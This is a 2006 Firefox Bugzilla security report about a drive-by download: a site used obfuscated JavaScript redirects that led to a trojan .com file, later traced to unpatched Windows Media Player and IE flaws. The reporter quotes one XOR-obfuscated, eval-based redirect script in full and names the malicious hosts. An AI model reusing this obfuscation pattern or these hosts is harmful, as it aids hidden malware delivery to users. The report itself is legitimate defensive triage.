Closed Bug 350457 Opened 19 years ago Closed 19 years ago

Security hole, allows redirect to malicious .com file

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: igitur, Unassigned)

References

(
URL
)

Details

(Whiteboard: [sg:investigate])

Attachments

(1 file)

Full HTTP sessions which leads to malicious .com file
30.77 KB, application/zip
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 Please don't follow the link if you don't have decent anti-virus software. F-Prot found the virus that Firefox let through. Using fiddler I found that the above link does a serious of redirects using obfuscated javascript (too complicated for me to understand). The last redirect is with this code: <script >YlSlzNpIGOj=new Function("REfIM","ISTPNJkDxKeaEsf='';for(gKFP=0;REfIM.length>gKFP;gKFP+=2)ISTPNJkDxKeaEsf+=String.fromCharCode(parseInt(REfIM.substr(gKFP,2),16)^195);return ISTPNJkDxKeaEsf");eval(YlSlzNpIGOj("aaa5ebada2b5aaa4a2b7acb1edb3afa2b7a5acb1aefefee494aaadf0f1e4eaafaca0a2b7aaacadedabb1a6a5fee4b4b4b4eda4acaca4afa6eda0acaee4"))</script > That redirects to a .com file that my PC tries to execute... and F-Prot luckily prevented that. F-Prot gives this message: Malicious code found in file C:\DOCUMENTS AND SETTINGS\E910102\LOCAL SETTINGS\TEMP\NPNEMB8I.COM. Infection: Trojan.Win32.Obfuscated.a Action: The file was deleted. Reproducible: Always Steps to Reproduce: 1. Follow the link (be careful)
What is the location of that .com file? I don't get a download dialog. I see that page contains an iframe with this location view-source:http://www.installare.net/e/ads.php?b=788 That code is filling all available memory I have on my computer. When I open that page locally, my McAfee virusscanner begins to complain about the Exploit-IframeBO!shellcode virus. This is mentioned here: http://vil.nai.com/vil/datreadme.aspx?seldatfiles=4405 From http://gathering.tweakers.net/forum/list_messages/978944 I get the information this is: http://secunia.com/advisories/12959/ which is an IE exploit.
Are you sure Firefox tried to *execute* the .com file? Many virus scanners complain if a malicious file is simply downloaded, e.g. to the cache or download directory.
(In reply to comment #2) > Are you sure Firefox tried to *execute* the .com file? Many virus scanners > complain if a malicious file is simply downloaded, e.g. to the cache or > download directory. > Jesse, true, I can't confirm that my PC actually tried to execute the file or just downloaded it. Either way... i'm not comfortable having that code on my PC, and if we can get Firefox not to download it at all, it would be great. Martijn, I'll attach the full HTTP sessions tomorrow to illustrate all the redirects, including the final .com file.
Which is www.google.com? I went to http://1.mp3liede.org/c33c5def/50311/1/www.google.com but that returns 404 to me.
The URL is http://td8eau9td.com/c33c5def/50311/1/www.google.com The previous redirects should've taken you to td8eau9td.com. It's possible that the td8eau9td, c33c5def and 50311 were randomly generated and deleted and that just it's our cache that still persists them. For another person they might be different.
What version of Windows Media Player do you have? I haven't yet de-obfuscated this yet, but the two times I've seen this style of obfuscation (using in part the length of the deobfuscating function as a key) it used the MS06-006 Windows Media Player vulnerability to download its attack code (which was a different payload, but those change all the time so that means nothing). I notice that one of the files it tries to get is called "nt_wmp.htm" which reinforces my suspicion, but I'll know for sure when I decode it. In the meanwhile check with windows update and make sure you've got the latest everything, or run the MS "Baseline Security Analyzer" which you can get from microsoft.com and will check to make sure you've applied all their patches. http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx (contains link to the Baseline Security Analyzer, too). This is, at this point, just a guess. If someone beats me to the de-obfuscation, what you're looking for is some script that preps memory with repeats of the attack code, and then an <embed> or <object> with a really, really long URL.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:investigate]
Before installing security patches, my WMP version is 10.00.00.4036 After installing security patches, my WMP version is STILL 10.00.00.4036, but the redirects to the "virus" don't occur anymore. So thank you, seems this was a Microsoft error. Never thought it could affect Firefox. Issue closed?
Hey guys... Must I close this issue? It was my first ever bug reports, so still new to the procedure.
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → INVALID
Group: security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: